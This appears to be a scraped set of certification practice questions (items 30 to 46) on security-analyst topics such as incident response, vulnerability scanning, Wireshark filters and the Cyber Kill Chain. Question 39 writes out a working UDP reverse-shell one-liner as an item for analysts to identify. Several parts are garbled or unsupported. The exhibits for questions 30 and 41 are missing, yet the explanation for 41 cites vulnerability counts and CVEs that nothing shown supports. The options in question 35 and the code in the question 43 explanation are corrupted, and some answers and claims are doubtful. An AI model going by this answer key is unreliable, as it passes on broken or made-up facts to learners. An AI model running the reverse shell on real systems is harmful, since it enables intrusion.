QUESTION: 30
Due to reports of unauthorized activity that was occurring on the internal network, an analyst is
performing a network discovery. The analyst runs an Nmap scan against a corporate network to
evaluate which devices were operating in the environment. Given the following output:
Which of the following choices should the analyst look at first?
A. wh4dc-748gy.lan (192.168.86.152)
B. lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)
Answer(s): E
Explanation:
The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious
device on the network. P4wnP1 ALOA is a tool that can be used to create a malicious USB device that
can perform various attacks, such as keystroke injection, network sniffing, man-in-the-middle, or
backdoor creation. The presence of a device with this name on the network could indicate that an
attacker has plugged in a malicious USB device to a system and gained access to the network.
Reference:
https://github.com/mame82/P4wnP1_aloa
QUESTION: 31
When starting an investigation, which of the following must be done first?
A. Notify law enforcement
B. Secure the scene
C. Seize all related evidence
D. Interview the witnesses
Answer(s): B
�Explanation:
The first thing that must be done when starting an investigation is to secure the scene. Securing the
scene involves isolating and protecting the area where the incident occurred, as well as any potential
evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or
destruction of evidence, as well as any interference or obstruction of the investigation.
QUESTION: 32
Which of the following describes how a CSIRT lead determines who should be communicated with
and when during a security incident?
A. The lead should review what is documented in the incident response policy or plan
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any t me
D. Subject matter experts on the team should communicate with others within the specified
area of expertise
Answer(s): A
Explanation:
The incident response policy or plan is a document that defines the roles and responsibilities,
procedures and processes, communication and escalation protocols, and reporting and
documentation requirements for handling security incidents. The lead should review what is
documented in the incident response policy or plan to determine who should be communicated with
and when during a security incident, as well as what information should be shared and how. The
incident response policy or plan should also be aligned with the organizational policies and legal
obligations regarding incident notification and disclosure.
QUESTION: 33
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the
organization.
Which of the following will produce the data needed for the briefing?
A. Firewall logs
B. Indicators of compromise
� C. Risk assessment
D. Access control lists
Answer(s): B
Explanation:
Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has
been compromised by an attacker or malware. IoCs can include IP addresses, domain names, URLs,
file hashes, registry keys, network traffic patterns, user behaviors, or system anomalies. IoCs can be
used to detect, analyze, and respond to security incidents, as well as to share threat intelligence with
other organizations or authorities. IoCs can produce the data needed for an executive briefing on
possible threats to the organization, as they can provide information on the source, nature, scope,
impact, and mitigation of the threats.
QUESTION: 34
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the
header to a known-malicious IP in another country.
Which of the following describes what the analyst has noticed?
A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal
Answer(s): A
QUESTION: 35
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a
potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can
see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is
not showing the packets containing the file transfer itself.
Which of the following can the analyst perform to see the entire contents of the downloaded files?
� A. Change the display filter to f cp. accive. pore
B. Change the display filter to tcg.port=20
C. Change the display filter to f cp-daca and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export objects option
Answer(s): C
Explanation:
The best way to see the entire contents of the downloaded files in Wireshark is to change the display
filter to ftp-data and follow the TCP streams. FTP-data is a protocol that is used to transfer files
between an FTP client and server using TCP port 20. By filtering for ftp-data packets and following
the TCP streams, the analyst can see the actual file data that was transferred during the FTP session.
QUESTION: 36
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability
report two hours ago: but the report did not have a follow-up remediation response from an analyst.
Which of the following documents should the SOC manager review to ensure the team is meeting
the appropriate contractual obligations for the customer?
A. SLA
B. MOU
C. NDA
D. Limitation of liability
Answer(s): A
Explanation:
SLA stands for service level agreement, which is a contract or document that defines the
expectations and obligations between a service provider and a customer regarding the quality,
availability, performance, or scope of a service. An SLA may also specify the metrics, penalties, or
remedies for measuring or ensuring compliance with the agreed service levels. An SLA can help the
SOC manager review if the team is meeting the appropriate contractual obligations for the customer,
such as response time, resolution time, reporting frequency, or communication channels.
QUESTION: 37
�Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish
communication with a successfully exploited target?
A. Command and control
B. Actions on objectives
C. Exploitation
D. Delivery
Answer(s): A
Explanation:
Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting
to establish communication with a successfully exploited target. C2 enables the adversary to
remotely control or manipulate the target system or network using various methods, such as
malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain
persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or
networks.
QUESTION: 38
A company that has a geographically diverse workforce and dynamic IPs wants to implement a
vulnerability scanning method with reduced network traffic.
Which of the following would best meet this requirement?
A. External
B. Agent-based
C. Non-credentialed
D. Credentialed
Answer(s): B
Explanation:
Agent-based vulnerability scanning is a method that involves installing software agents on the target
systems or networks that can perform local scans and report the results to a central server or
console. Agent-based vulnerability scanning can reduce network traffic, as the scans are performed
locally and only the results are transmitted over the network. Agent-based vulnerability scanning can
�also provide more accurate and up-to-date results, as the agents can scan continuously or on-
demand, regardless of the system or network status or location.
QUESTION: 39
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?
A. RCE
B. Reverse shell
C. XSS
D. SQL injection
Answer(s): B
Explanation:
A reverse shell is a type of shell access that allows a remote user to execute commands on a target
system or network by reversing the normal direction of communication. A reverse shell is usually
created by running a malicious script or program on the target system that connects back to the
remote user's system and opens a shell session. A reverse shell can bypass firewalls or other security
controls that block incoming connections, as it uses an outgoing connection initiated by the target
system. In this case, the security analyst has detected an exploit attempt containing the following
command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
This command is a shell script that creates a reverse shell connection from the target system to the
remote user's system at IP address 10.1.1.1 and port 4821 using UDP protocol.
QUESTION: 40
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available
exploit being used to deliver ransomware.
�Which of the following factors would an analyst most likely communicate as the reason for this
escalation?
A. Scope
B. Weaponization
C. CVSS
D. Asset value
Answer(s): B
Explanation:
Weaponization is a factor that describes how an adversary develops or acquires an exploit or payload
that can take advantage of a vulnerability and deliver a malicious effect. Weaponization can increase
the severity or impact of a vulnerability, as it makes it easier or more likely for an attacker to exploit it
successfully and cause damage or harm. Weaponization can also indicate the level of sophistication
or motivation of an attacker, as well as the availability or popularity of an exploit or payload in the
cyber threat landscape. In this case, an older CVE with a vulnerability score of 7.1 was elevated to a
score of 9.8 due to a widely available exploit being used to deliver ransomware. This indicates that
weaponization was the reason for this escalation.
QUESTION: 41
An analyst is reviewing a vulnerability report for a server environment with the following entries:
Which of the following systems should be prioritized for patching first?
A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228
Answer(s): D
Explanation:
The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number
and severity of vulnerabilities among the four systems listed in the vulnerability report. According to
the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings.
The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-
0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution
vulnerabilities that can allow an attacker to compromise the system without any user interaction or
�authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as
possible.
QUESTION: 42
A company is in the process of implementing a vulnerability management program, and there are
concerns about granting the security team access to sensitive dat
Which of the following scanning methods can be implemented to reduce the access to systems while
providing the most accurate vulnerability scan results?
A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning
Answer(s): C
Explanation:
Agent-based scanning is a method that involves installing software agents on the target systems or
networks that can perform local scans and report the results to a central server or console. Agent-
based scanning can reduce the access to systems, as the agents do not require any credentials or
permissions to scan the local system or network. Agent-based scanning can also provide the most
accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of
the system or network status or location.
QUESTION: 43
A security analyst is trying to identify anomalies on the network routing.
Which of the following functions can the analyst use on a shell script to achieve the objective most
accurately?
� A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}
').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
D. function x() { info=$(traceroute -m 40 $1 | awk `END{print $1}') && echo "$1 | $info" }
Answer(s): C
Explanation:
The function that can be used on a shell script to identify anomalies on the network routing most
accurately is:
function x() { info=(dig(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}
').origin.asn.cymru.com TXT +short) && echo "$1 | $info" } This function takes an IP address as an
argument and performs two DNS lookups using the dig command. The first lookup uses the -x option
to perform a reverse DNS lookup and get the hostname associated with the IP address.
The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number
(ASN) and other information related to the IP address. The function then prints the IP address and
the ASN information, which can help identify any routing anomalies or inconsistencies
QUESTION: 44
There are several reports of sensitive information being disclosed via file sharing services. The
company would like to improve its security posture against this threat.
Which of the following security controls would best support the company in this scenario?
A. Implement step-up authentication for administrators
B. Improve employee training and awareness
C. Increase password complexity standards
D. Deploy mobile device management
Answer(s): B
Explanation:
The best security control to implement against sensitive information being disclosed via file sharing
services is to improve employee training and awareness. Employee training and awareness can help
educate employees on the risks and consequences of using file sharing services for sensitive
�information, as well as the policies and procedures for handling such information securely and
appropriately. Employee training and awareness can also help foster a security culture and
encourage employees to report any incidents or violations of information security.
QUESTION: 45
Which of the following is the best way to begin preparation for a report titled "What We Learned"
regarding a recent incident involving a cybersecurity breach?
A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
C. Include a table of contents outlining the entire report
D. Decide on the color scheme that will effectively communicate the metrics
Answer(s): A
Explanation:
The best way to begin preparation for a report titled "What We Learned" regarding a recent incident
involving a cybersecurity breach is to determine the sophistication of the audience that the report is
meant for. The sophistication of the audience refers to their level of technical knowledge,
understanding, or interest in cybersecurity topics. Determining the sophistication of the audience
can help tailor the report content, language, tone, and format to suit their needs and expectations.
For example, a report for executive management may be more concise, high-level, and business-
oriented than a report for technical staff or peers.
QUESTION: 46
A security analyst is performing an investigation involving multiple targeted Windows malware
binaries. The analyst wants to gather intelligence without disclosing information to the attackers.
Which of the following actions would allow the analyst to achieve the objective?
A. Upload the binary to an air gapped sandbox for analysis
B. Send the binaries to the antivirus vendor
C. Execute the binaries on an environment with internet connectivity
D. Query the file hashes using VirusTotal
Answer(s): A
